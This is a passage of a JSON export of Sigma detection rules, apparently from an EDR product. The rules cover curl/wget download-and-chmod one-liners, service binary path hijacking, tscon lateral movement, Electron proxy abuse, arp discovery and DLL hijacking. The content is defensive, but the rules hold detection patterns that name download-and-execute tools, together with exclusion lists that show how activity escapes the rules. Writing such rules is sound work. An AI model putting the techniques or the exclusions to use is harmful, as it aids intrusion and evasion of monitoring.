"content": "title: Suspicious Download and Execution of a Remote File (Linux)\nid: 54eff1c1-eb8a-43c1-a752-478f492a2912\ndescription: |\n Detects when curl or wget are used to download a remote file, followed by a chmod to execute it (as a one liner).\n Attackers often use this technique to execute payloads for initial access (by luring a user into executing the command) or simply because of its simplicity.\n It is recommended to investigate the remote file and the actions it performs to ensure it is legitimate.\nreferences:\n - https://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2021/09/28\nmodified: 2025/12/18\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1222.002\n - attack.execution\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.FileDownload\n - classification.Linux.Behavior.InitialAccess\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/sh'\n - '/bash'\n - '/csh'\n - '/dash'\n - '/ksh'\n - '/tcsh'\n - '/zsh'\n CommandLine|contains:\n - 'wget*chmod*+x'\n - 'wget*chmod* 7?? '\n - 'curl*chmod*+x'\n - 'curl*chmod* 7?? '\n\n exclusion_script:\n CommandLine|contains:\n - 'sh -c #!/bin/sh'\n - 'sh -c #!/bin/bash'\n - 'sh -c #!/usr/bin/env bash'\n - 'sh -c #! /usr/bin/env bash'\n\n exclusion_parentimage:\n ParentImage:\n - '/usr/sbin/cron'\n - '/usr/sbin/crond'\n - '/usr/bin/make'\n\n exclusion_coder:\n CommandLine|contains: '# This is to allow folks to exec into a failed workspace and poke around to'\n\n exclusion_songui:\n Ancestors|contains:\n - '/vendor_android/out/soong_ui'\n - '/android/out/soong_ui'\n\n exclusion_ninja:\n Ancestors|contains: '/bin/ninja|'\n\n exclusion_containers:\n Ancestors|contains:\n - '/usr/bin/runc|/usr/bin/dockerd'\n - '/usr/sbin/runc|/usr/sbin/dockerd'\n - '/usr/sbin/runc|/usr/bin/dockerd'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/sbin/containerd-shim-runc-v2'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n - '|/snap/docker/*/bin/dockerd|'\n - '|/usr/bin/podman|'\n\n exclusion_gitlab:\n Ancestors|contains: '|/usr/bin/gitlab-runner|'\n\n exclusion_proxmox:\n Ancestors|contains: '|/usr/libexec/proxmox/proxmox-termproxy|'\n\n exclusion_ssh:\n CommandLine|contains: '/bin/sh -c ssh * sh << ?EOSSH?'\n\n exclusion_claude:\n ParentCommandLine:\n - 'claude'\n - 'node /home/*/.nvm/versions/node/v*/bin/claude'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "54eff1c1-eb8a-43c1-a752-478f492a2912",
"rule_name": "Suspicious Download and Execution of a Remote File (Linux)",
"rule_description": "Detects when curl or wget are used to download a remote file, followed by a chmod to execute it (as a one liner).\nAttackers often use this technique to execute payloads for initial access (by luring a user into executing the command) or simply because of its simplicity.\nIt is recommended to investigate the remote file and the actions it performs to ensure it is legitimate.\n",
"rule_creation_date": "2021-09-28",
"rule_modified_date": "2025-12-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1222.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "550ab391-082f-41b0-82d9-2dd1a6308d59",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604684Z",
"creation_date": "2026-03-23T11:45:34.604687Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604695Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/juliourena/SharpNoPSExec",
"https://attack.mitre.org/techniques/T1569/002/"
],
"name": "t1569_002_suspicious_service_binary_path_modification.yml",
"content": "title: Suspicious Service Binary Path Modification\nid: 550ab391-082f-41b0-82d9-2dd1a6308d59\ndescription: |\n Detects the suspicious modification of a service's binary path, specifically for services that are disabled by default and have LocalSystem privileges.\n Attackers may try to modify existing services to serve their own payload instead of the legitmate service binary.\n This technique is for instance used by the SharpNoPSExec tool.\n It is recommended to analyze the new binary set for service to look for malicious content as well as to investigate the user performing this action to determine whether it is legitimate.\nreferences:\n - https://github.com/juliourena/SharpNoPSExec\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2021/05/03\nmodified: 2025/04/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Image|endswith: '\\services.exe'\n # Lists services that are disable by default and have LocalSystem privileges\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\AppVClient\\ImagePath' # Windows 10, Windows Server 2019, Windows Server 2016\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\AxInstSV\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Browser\\ImagePath' # Windows Server 2016, Windows Server 2012 r2\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CscService\\ImagePath' # Windows Server 2019, Windows Server 2016\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DialogBlockingService\\ImagePath' # Windows 10\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\dmwappushservice\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\GraphicsPerfSvc\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\lfsvc\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\MsKeyboardFilter\\ImagePath' # Windows 10\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NtFrs\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\PushToInstall\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\RemoteAccess\\ImagePath' # Windows 10, Windows Server 2016, Windows Server 2012 r2\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\ScDeviceEnum\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SensorDataService\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\ImagePath' # Windows Server 2019, Windows Server 2012 r2\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\shpamsvc\\ImagePath' # Windows 10, Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\ssh-agent\\ImagePath' # Windows 10, Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\UevAgentService\\ImagePath' # Windows 10, Windows Server 2019, Windows Server 2016\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\uhssvc\\ImagePath' # Windows 10\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WalletService\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\wisvc\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WSearch\\ImagePath' # Windows Server 2019, Windows Server 2016\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n - '\"\"'\n\n exclusion_legitimate_svc_binaries:\n Details|contains:\n - '?:\\Program Files\\Microsoft Update Health Tools\\uhssvc.exe' # uhssvc\n - '?:\\Windows\\system32\\AgentService.exe' # UevAgentService\n - '?:\\Windows\\system32\\AppVClient.exe' # AppVClient\n - '?:\\Windows\\system32\\ntfrs.exe' # NtFrs\n - '?SystemRoot?\\system32\\ntfrs.exe' # NtFrs\n - '*\\OpenSSH\\ssh-agent.exe' # ssh-agent\n - '*\\OpenSSH-Win64\\ssh-agent.exe' # ssh-agent\n - '?:\\Windows\\system32\\SearchIndexer.exe ' # WSearch\n - '%systemroot%\\system32\\SearchIndexer.exe ' # WSearch\n - '?:\\Windows\\System32\\SensorDataService.exe' # SensorDataService\n - '?:\\Windows\\system32\\svchost.exe -k ' # AxInstSV, Browser, CscService, DialogBlockingService, dmwappushservice, GraphicsPerfSvc, lfsvc, MsKeyboardFilter, PushToInstall, RemoteAccess, ScDeviceEnum, SharedAccess, shpamsvc, WalletService, wisvc\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "550ab391-082f-41b0-82d9-2dd1a6308d59",
"rule_name": "Suspicious Service Binary Path Modification",
"rule_description": "Detects the suspicious modification of a service's binary path, specifically for services that are disabled by default and have LocalSystem privileges.\nAttackers may try to modify existing services to serve their own payload instead of the legitmate service binary.\nThis technique is for instance used by the SharpNoPSExec tool.\nIt is recommended to analyze the new binary set for service to look for malicious content as well as to investigate the user performing this action to determine whether it is legitimate.\n",
"rule_creation_date": "2021-05-03",
"rule_modified_date": "2025-04-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "55220ced-81e7-4e5d-a0e9-929ac80f50cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076643Z",
"creation_date": "2026-03-23T11:45:34.076645Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076649Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
"https://blog.gentilkiwi.com/securite/vol-de-session-rdp",
"https://attack.mitre.org/techniques/T1563/002/"
],
"name": "t1563_002_tscon_usage.yml",
"content": "title: Possible Lateral Movement via Tscon\nid: 55220ced-81e7-4e5d-a0e9-929ac80f50cf\ndescription: |\n Detects the usage of the tscon.exe utility. Terminal Services Console (tscon) is used to connect to another session on a Remote Desktop Session Host server.\n This can be used as an attacker with credentials to try and move laterally and acquire more credentials.\n To investigate this alert, look for the usage of qwinsta or quser as a way to discover remote RDP sessions. HarfangLab EDR provides alerts when these binaries are used for discovery.\n It also recommended to attempt to correlate RDP logins across machines to determine if the tool was used successfully.\nreferences:\n - https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement\n - https://blog.gentilkiwi.com/securite/vol-de-session-rdp\n - https://attack.mitre.org/techniques/T1563/002/\ndate: 2023/08/25\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Tscon\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'tscon.exe'\n\n # There's another rule for this (Hijacking)\n exclusion_system:\n UserSID|startswith: 'S-1-5-18'\n\n exclusion_systancia:\n - ParentImage|endswith:\n - '\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\AppliDis Starter.exe'\n - '\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\ThinDesktop\\adisbureau.exe'\n - GrandparentImage: '?:\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\ThinDesktop\\AppliDisVDIObserver.exe'\n\n exclusion_osiris:\n ParentImage|endswith: '\\Corwin\\Osiris\\Appli.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\n#level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "55220ced-81e7-4e5d-a0e9-929ac80f50cf",
"rule_name": "Possible Lateral Movement via Tscon",
"rule_description": "Detects the usage of the tscon.exe utility. Terminal Services Console (tscon) is used to connect to another session on a Remote Desktop Session Host server.\nThis can be used as an attacker with credentials to try and move laterally and acquire more credentials.\nTo investigate this alert, look for the usage of qwinsta or quser as a way to discover remote RDP sessions. HarfangLab EDR provides alerts when these binaries are used for discovery.\nIt also recommended to attempt to correlate RDP logins across machines to determine if the tool was used successfully.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "55244098-589e-4076-b4a9-0b6889dbc53c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078282Z",
"creation_date": "2026-03-23T11:45:34.078284Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078289Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://positive.security/blog/ms-officecmd-rce",
"https://attack.mitre.org/techniques/T1090",
"https://attack.mitre.org/techniques/T1573"
],
"name": "t1090_electron_proxy.yml",
"content": "title: Insecure Proxy Settings Set on Electron Application\nid: 55244098-589e-4076-b4a9-0b6889dbc53c\ndescription: |\n Detects the execution of an Electron-based application (Teams, Skype, etc.) using insecure proxy settings.\n This could be used to monitor the network traffic of those applications and steal credentials.\n It is recommended to investigate other malicious activity on the current machine and look for any lateralization alerts.\nreferences:\n - https://positive.security/blog/ms-officecmd-rce\n - https://attack.mitre.org/techniques/T1090\n - https://attack.mitre.org/techniques/T1573\ndate: 2021/12/17\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1090\n - attack.t1573\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n app_skype:\n - Image|endswith: '\\skype.exe'\n - OriginalFileName: 'Skype.exe'\n app_teams:\n - Image|endswith: '\\Teams.exe'\n - OriginalFileName: 'Teams.exe'\n selection:\n CommandLine|contains|all:\n - '--ignore-certificate-errors'\n - '--host-rules'\n condition: 1 of app_* and selection\nlevel: medium\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "55244098-589e-4076-b4a9-0b6889dbc53c",
"rule_name": "Insecure Proxy Settings Set on Electron Application",
"rule_description": "Detects the execution of an Electron-based application (Teams, Skype, etc.) using insecure proxy settings.\nThis could be used to monitor the network traffic of those applications and steal credentials.\nIt is recommended to investigate other malicious activity on the current machine and look for any lateralization alerts.\n",
"rule_creation_date": "2021-12-17",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1573"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5557b16c-8005-48ea-9059-b7641cba9823",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.468858Z",
"creation_date": "2026-03-23T11:45:34.627045Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627049Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/arp.8.html",
"https://gtfobins.github.io/gtfobins/arp/",
"https://attack.mitre.org/techniques/T1016/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/software/S0099/"
],
"name": "t1016_arp_linux.yml",
"content": "title: Arp Execution (Linux)\nid: 5557b16c-8005-48ea-9059-b7641cba9823\ndescription: |\n Detects the execution of arp, a tool used to display information about the system's Address Resolution Protocol (ARP) cache.\n Attackers may use it during discovery phase to display ARP configuration information on the host or to discover remote systems.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://man7.org/linux/man-pages/man8/arp.8.html\n - https://gtfobins.github.io/gtfobins/arp/\n - https://attack.mitre.org/techniques/T1016/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/software/S0099/\ndate: 2022/12/23\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - attack.t1018\n - attack.s0099\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Arp\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/arp'\n ParentImage|startswith: '?'\n\n # Exclude manual arp launched from a terminal emulator\n exclusion_terminal_emulators:\n GrandparentCommandLine|endswith:\n - '/gnome-terminal-server'\n - '/terminator'\n - '/xfce4-terminal'\n - '/xterm'\n\n exclusion_fusioninventory:\n ParentCommandLine:\n - 'fusioninventory-agent: task NetDiscovery'\n - 'fusioninventory-agent (tag *'\n - '/usr/bin/perl /usr/bin/fusioninventory-agent --daemon --no-fork'\n\n exclusion_qualys:\n - GrandparentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n - ProcessAncestors|contains:\n - '|/usr/local/qualys/cloud-agent/bin/qualys-scan-util|'\n - '|/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent|'\n\n exclusion_oracle:\n - ParentImage: '*/oracle/*/agent_*/perl/bin/perl'\n - CurrentDirectory|startswith:\n - '/u01/app/grid/'\n - '/u01/app/oracle/'\n\n exclusion_oracle_oswatcher:\n ParentCommandLine|startswith:\n - '/bin/sh ./arpsub.sh '\n - '/bin/sh ./OSWatcher.sh'\n GrandparentCommandLine|startswith: '/bin/sh ./OSWatcher.sh'\n User: 'oracle'\n\n exclusion_oracle_diagsnap:\n ParentImage:\n - '/usr/bin/bash'\n - '/bin/sh'\n - '*/perl/bin/perl'\n # /u01/app/grid/19.9.0.0/perl/bin/perl /u01/app/grid/19.9.0.0/bin/diagsnap.pl start\n GrandparentImage|endswith: '/perl/bin/perl'\n GrandparentCommandLine|contains: '/bin/diagsnap.pl'\n\n exclusion_dsagent:\n ParentCommandLine: '/bin/bash /opt/ds_agent/ds_agent.init start'\n\n exclusion_glpi:\n - GrandparentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - '/usr/bin/perl /usr/bin/glpi-agent'\n - '/usr/bin/perl /usr/bin/glpi-agent *'\n - '*/bin/perl */glpi-agent/agent/bin/glpi-agent *'\n - CurrentDirectory:\n - '/opt/glpi-agent/agent/bin'\n - '/opt/glpi-agent/agent/bin/'\n\n exclusion_espcli:\n ParentCommandLine|endswith: '>adrmac.txt'\n GrandparentCommandLine: './espcli_parc'\n\n exclusion_rc3:\n CommandLine: '/sbin/arp -f /etc/ethers'\n ParentCommandLine|startswith: '/bin/bash /etc/rc3.d/S10network'\n\n exclusion_ds_agent:\n ParentCommandLine: '/bin/bash /opt/ds_agent/Linux.init start'\n\n exclusion_run-parts:\n GrandparentImage: '/usr/bin/run-parts'\n\n exclusion_containerd:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/docker-containerd-shim-current|'\n\n exclusion_bladelogic:\n ProcessAncestors|contains: '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n\n exclusion_trendmicro:\n ParentCommandLine: '/bin/bash /opt/TrendMicro/vls_agent/vls_agent.init start'\n\n exclusion_puppet:\n - ParentCommandLine: '/usr/bin/ruby /usr/sbin/puppetd'\n - GrandparentCommandLine: '/usr/bin/ruby /usr/sbin/puppetd'\n\n exclusion_facter:\n GrandparentCommandLine|contains:\n - 'sh -c /usr/bin/facter'\n - '/usr/bin/ruby /usr/bin/facter'\n\n exclusion_init:\n ParentCommandLine: '/bin/bash /etc/init.d/network'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_vscode:\n Ancestors|contains: '|/snap/code/*/usr/share/code/code|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5557b16c-8005-48ea-9059-b7641cba9823",
"rule_name": "Arp Execution (Linux)",
"rule_description": "Detects the execution of arp, a tool used to display information about the system's Address Resolution Protocol (ARP) cache.\nAttackers may use it during discovery phase to display ARP configuration information on the host or to discover remote systems.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016",
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5565ad8d-5653-4d91-a582-0e35a93d3dd5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091416Z",
"creation_date": "2026-03-23T11:45:34.091419Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091423Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_fxscover.yml",
"content": "title: Phantom DLL Hijacking via fxscover.exe\nid: 5565ad8d-5653-4d91-a582-0e35a93d3dd5\ndescription: |\n Detects a potential Windows DLL search order hijacking via fxscover.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'FXSCOVER.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\spool\\DRIVERS\\W32X86\\3\\TPPrnUIENU.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5565ad8d-5653-4d91-a582-0e35a93d3dd5",
"rule_name": "Phantom DLL Hijacking via fxscover.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via fxscover.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "557844a6-9c5c-4790-9e5a-11e64897142a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
